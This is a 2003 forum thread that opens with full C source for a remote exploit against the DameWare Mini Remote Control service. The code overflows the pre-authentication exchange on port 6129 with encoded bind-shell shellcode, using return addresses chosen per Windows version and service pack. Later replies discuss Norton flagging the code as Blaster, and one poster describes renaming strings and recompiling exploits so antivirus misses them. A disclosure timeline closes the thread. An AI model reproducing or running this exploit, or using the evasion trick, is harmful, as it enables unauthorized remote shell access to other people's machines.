Dwmrcexp.c

101

Dec 20 2003, 10:10 AM

0day released by wirepair

CODE

#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#endif
#include <string.h>
#include <stdio.h>

#ifdef _WIN32
#else
#define DWORD unsigned long
#endif
struct sockaddr_in serv;
int main(int argc, char **argv) {
#ifdef _WIN32
WSADATA wsa;
#endif
int s;
DWORD xpsp0 = 0x77e9fc79; // kernel32 probably should be changed...
DWORD xpsp1 = 0x77E9AE59; // kernel32 probably should be changed...
DWORD sp1 = 0x74fd41b3; // msafd.dll works with sp1 base, haven't verified patches.
DWORD sp2 = 0x74fd1b4b; // msafd.dll works with sp2 base, haven't verified patches.
DWORD sp3 = 0x74fd2d57; // msafd.dll works with sp3 base and sp3 fully patched.
DWORD sp4 = 0x74fdee63; // msafd.dll works with sp4 base and sp4 fully patched.
unsigned short lportl = 666;
int sp, x,i;
int winvers;
char recvbuf[10000];
char sendbuf[4096];
int nosp = 0;
char userl[] = "ssh0dan.org";
char userr[] = "Administrator1";
char nbname[] = "SH0DAN";
char nbnamel[] = "sh0dan";
char company[] = "ZOOPTARD";
char reger[] = "HAHAHA";
char stuff[] = "55274-644-2791234-23134";
char date[] = "11/22/03 17:09:54";
char ip[] = "192.168.1.249,192.168.43.1,192.168.0.1";
char vers[] = "3.72.0.3";
char wtf[] = "\x20\x00\x00\x00";
char rest1[] =
"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\xb7\x82\x08\xe0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xa8\x00\x00\x00";
char rest2[] =
"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00\x00\x18\x00\x18\x00"
"\x68\x00\x00\x00\x18\x00\x18\x00\x80\x00\x00\x00\x00\x00\x00\x00"
"\x40\x00\x00\x00\x1c\x00\x1c\x00\x40\x00\x00\x00\x0c\x00\x0c\x00"
"\x5c\x00\x00\x00\x10\x00\x10\x00\x98\x00\x00\x00\x35\x82\x88\xe0"
"\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00"
"\x72\x00\x61\x00\x74\x00\x6f\x00\x72\x00\x31\x00\x5a\x00\x49\x00"
"\x4e\x00\x47\x00\x2d\x00\x32\x00\x07\x4b\x9d\xd8\x93\x3f\xaf\x70"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xd1\x9e\x0a\x37\xd4\x71\x24\xfb\x17\x61\x01\x76\x52\x35\xcd\x80"
"\xba\xab\xd6\x81\x0b\xe2\x96\x87\x6e\x86\xc4\xa4\xc0\x11\x5e\x31"
"\x87\x97\xb6\x80\xd7\xc4\xe7\x4d";

char lport[] = "\x00\xFF\xFF\x8b";
char sc[] =
"\xbb\xed\x4f\x7c" // ret
"\x90\x90\x90\x90"
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

if(argc < 3) {
fprintf(stderr, "Usage: %s <host> <bind shellport>\n", argv[0]);
exit(1);
}

lportl = atoi(argv[2]);
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&sc[264],&lport,4);
#ifdef _WIN32
WSAStartup(MAKEWORD(1,0),&wsa);
#endif
serv.sin_addr.s_addr = inet_addr(argv[1]);
serv.sin_port = htons(6129);
serv.sin_family = AF_INET;

s = socket(AF_INET, SOCK_STREAM, 0);

connect(s, (struct sockaddr *)&serv, sizeof(struct sockaddr));
x = recv(s, recvbuf, sizeof(recvbuf), 0);
// change some bytes send it back //
recvbuf[26] = 0x00;
recvbuf[30] = 0x00;
recvbuf[36] = 0x01;
send(s, recvbuf, 40, 0);
x = recv(s, recvbuf, sizeof(recvbuf), 0);

/* start identifying os */
if (recvbuf[8]==5 && recvbuf[12]==1) {
winvers = 1;
} else if (recvbuf[8]==5 && recvbuf[12]==0) {
winvers = 0;
} else {
winvers = 2;
}
for (i = 0; i <= x; i++) {
if(recvbuf[i] == 'S') {
//sp = atoi(recvbuf+i+13);
sp = atoi(&recvbuf[37]);
break;
} else {
nosp = 1;
}
}
if (winvers == 0) {
switch (sp) {
case 1:
memcpy(sc, &sp1, 4);
printf("Host is running Windows 2000 SP: %d\n", sp);
break;
case 2:
memcpy(sc, &sp2, 4);
printf("Host is running Windows 2000 SP: %d\n", sp);
break;
case 3:
memcpy(sc, &sp3, 4);
printf("Host is running Windows 2000 SP: %d\n", sp);
break;
case 4:
memcpy(sc, &sp4, 4);
printf("Host is running Windows 2000 SP: %d\n", sp);
break;
default:
fprintf(stderr, "Error finding service pack inspect manually... Exiting\n");
#ifdef _WIN32
closesocket(s);
#else
close(s);
#endif
exit(1);
}
} else if( winvers == 1) {

if(nosp == 1) {
printf("Host is running Windows XP SP: 0\n");
memcpy(sc, &xpsp0, 4);
} else if (sp == 1) {
printf("Host is running Windows XP SP: %d\n", sp);
memcpy(sc, &xpsp1, 4);
}
} else {
fprintf(stderr, "Unknown OS sorry Exiting...\n");
exit(1);
}
/* end identifying os */

memset(sendbuf, 0x00, sizeof(sendbuf));
memset(sendbuf, 0x10, 1);
memset(sendbuf+1, 0x27, 1); // size

x = 196; // first offset for local username
memcpy(sendbuf+x, userl, sizeof(userl));
x += strlen(userl);
memset(sendbuf+x, 0x42, 309); // bunch of garbage that gets stripped anyways.
x+=309;
memcpy(sendbuf+x, sc, sizeof(sc)); // after this we're basically overwriting every other string so no point heh.
// i'm still pretty certain you need to finish up the entire pre-auth communication.
// seeing as how the function doesn't return until after the auth fails heh.
x = 2796;
memcpy(sendbuf+x, nbnamel, strlen(nbnamel));
x = 3056;
memcpy(sendbuf+x, ip, strlen(ip));
x = 3836;
memcpy(sendbuf+x, vers, strlen(vers));
send(s, sendbuf, sizeof(sendbuf), 0);
x = recv(s, recvbuf, sizeof(recvbuf), 0);

/* send wtf */
send(s, wtf, 4, 0);
/* send rest */

send(s, rest1, sizeof(rest1), 0);
x = recv(s, recvbuf, sizeof(recvbuf), 0);

send(s, rest2, sizeof(rest2), 0);
x = recv(s, recvbuf, sizeof(recvbuf), 0);
printf("End Data (Includes NetBIOS Name:\n");
for (i = 0; i <= x; i++) {
printf("%c", recvbuf[i]);
}

return(0);
}

DJVASTVASTY2K

Dec 20 2003, 10:30 AM

Hello M8's

Just Trying To Save Your Computers

Do Not Download This>>>>>>>>

>>>>>This Contains WIN32 BLASTER virus<<<<<

Nortons 2004 Pro

Detected Virus [WIN32 BLASTER]

Best Regards

Adam

Vast Gsm

101

Dec 20 2003, 11:08 AM

Another one who use norton shits

recycle your antivirus man seriously ...

boshcash

Dec 20 2003, 11:21 AM

well original file is at : http://sh0dan.org/files/dwmrcexp.c go get it and compile it ..

clip

Dec 20 2003, 11:31 AM

looks nice .. thanks.

ps. this is for the dameware hole.

tazthedev

Dec 20 2003, 03:20 PM

I got my norton up-to-date, and the executable isnt saw as a virus by norton... i got norton 2003 ...

320X

Dec 20 2003, 03:50 PM

Norton Antivirus is bullshit compile the version of the 0 days with the vc++

thatsmej

Dec 20 2003, 03:51 PM

norton 2004 says here to that it`s a msblaster worm...

sow i guess he looks at some know codes wich are the same or sow..

TedOb1

Dec 20 2003, 04:18 PM

i compiled it from the 'original' code off the site with gcc. norton (corp. ed.) picked it up as blaster as soon as it compiled. to compile this i needed to turn off realtime protection and store it in a dir i have excluded from nortons seach. just because it detects anything that uses a blaster type string as blaster doesn't mean norton sucks...i want it to detect anything even remotly dangerous on my network and don't mind taking the extra steps.

thanks for the code 101

101

Dec 20 2003, 04:49 PM

Thats wirepair ted to thanx , i did nothing without to brought it faslty there for testing.
About Norton yeah you can all forget it , I already made some tests , there are a long time so but ..
I was using some old exploit detected by Norton. I edited lame sentences, words like "Exploits" "Target Succesfully exploited" etc.. etc..
After a "re"compilation , it was no more detected .....

This let j00 see how norton can detect evrything as nothing

nb: i know, crap english, sorry .. & l8r.

//EDIT: If you wanna test , took hk.exe , should be still detect by norton, edit it like i said & recompile it. The tool will be safe

flame

Dec 20 2003, 05:35 PM

its just the shellcode thats being spotted as a blaster - thats a wellknown FACT

TedOb1

Dec 20 2003, 06:34 PM

with the patch already released you can hardly call it 0day though. maybe 1day or 6day !?!

Time Table:
Nov 21st, Vulnerability identified and Exploit written.
Nov 23rd, First contact with DameWare
Nov 24th, Response by DameWare stating they will inspect the issue.
Nov 26th, DameWare supplied me a hotfix to re-test.
Dec 4th, DameWare put hotfix (new version) Online for clients to download.
Dec 14th, This advisory is released.
Dec 20th, I plan on releasing my exploit code.